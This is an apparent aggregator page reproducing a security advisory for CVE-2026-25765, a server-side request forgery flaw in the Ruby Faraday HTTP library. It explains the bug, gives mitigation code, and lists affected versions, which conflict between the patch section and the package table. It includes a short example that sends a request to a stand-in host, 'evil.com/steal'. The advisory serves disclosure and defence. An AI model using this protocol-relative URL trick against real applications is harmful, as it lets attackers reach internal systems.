🛡️ CVE-2026-25765 — faraday

🟡 CVSS 5.8 — Medium ✅ No Known Exploit CWE-918 OSV
5.8
CVSS Score
0 Low4 Medium7 High9 Critical10

Description

Faraday affected by SSRF via protocol-relative URL host override in build_exclusive_url

Impact

Faraday's build_exclusive_url method (in lib/faraday/connection.rb) uses Ruby's

URI#merge to combine the connection's base URL with a user-supplied path. Per RFC 3986,

protocol-relative URLs (e.g. //evil.com/path) are treated as network-path references

that override the base URL's host/authority component.

This means that if any application passes user-controlled input to Faraday's get(),

post(), build_url(), or other request methods, an attacker can supply a

protocol-relative URL like //attacker.com/endpoint to redirect the request to an

arbitrary host, enabling Server-Side Request Forgery (SSRF).

The ./ prefix guard added in v2.9.2 (PR #1569) explicitly exempts URLs starting with

/, so protocol-relative URLs bypass it entirely.

Example:

```ruby

conn = Faraday.new(url: 'https://api.internal.com')

conn.get('//evil.com/steal')

# Request is sent to https://evil.com/steal instead of api.internal.com

```

Patches

Faraday v2.14.1 is patched against this security issue. All versions of Faraday up to 2.14.0 are affected.

Workarounds

NOTE: Upgrading to Faraday v2.14.1+ is the recommended action to mitigate this issue, however should that not be an option please continue reading.

Applications should validate and sanitize any user-controlled input before passing it to

Faraday request methods. Specifically:

  • Reject or strip input that starts with // followed by a non-/ character
  • Use an allowlist of permitted path prefixes
  • Alternatively, prepend ./ to all user-supplied paths before passing them to Faraday

Example validation:

```ruby

def safe_path(user_input)

raise ArgumentError, "Invalid path" if user_input.match?(%r{\A//[^/]})

user_input

end

```

How this vulnerability can be exploited

This issue can be reached over the network, attack complexity is low, an attacker needs no privileges on the target. No user interaction is required. The scope is changed, meaning a successful attack can affect components beyond the vulnerable one. Rated impact: confidentiality low, integrity none, availability none.

Weakness class

CVE-2026-25765 is classified as CWE-918: Server-Side Request Forgery (SSRF). The server fetches a URL supplied by the caller, which can be pointed at internal systems it alone can reach.

Affected software

CVE-2026-25765 is recorded against 1 package.

  • faraday (from 1.0.0 up to 1.10.5)

Timeline and source

Published on 9 February 2026 and last revised on 8 July 2026. No public exploit is currently recorded for this entry. A vendor advisory or fix has been published. Record sourced from OSV.

References

github.com (Web)
nvd.nist.gov (Advisory)
github.com (Web)
github.com (Web)
github.com (Package)
github.com (Web)
github.com (Web)
github.com (Web)
www.rfc-editor.org (Web)
www.rfc-editor.org (Web)

CVE-2026-25765 on other distributions

Each distribution ships its own build and its own fixed version. Pick the one you run:

Details

Severity MEDIUM
CVSS Score 5.8
CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
CWE CWE-918
Public Exploit ✅ No
Source OSV
Published 2026-02-09
Updated 2026-08-12
Modified 2026-07-08

Affected Packages

Software From version Fixed in
faraday 1.0.0 1.10.5

Similar Threats

Vulnerability Monitoring

Track new vulnerabilities in faraday

CVE-2026-25765 is rated CVSS 5.8 Medium. BotEraser monitors your WordPress installation and notifies you when software you use appears in our vulnerability database.

Set Up Free Alerts →

No credit card required  ·  Results in minutes

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the vulnerabilities listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.

Browse related advisories

All advisoriesCVECVE 2026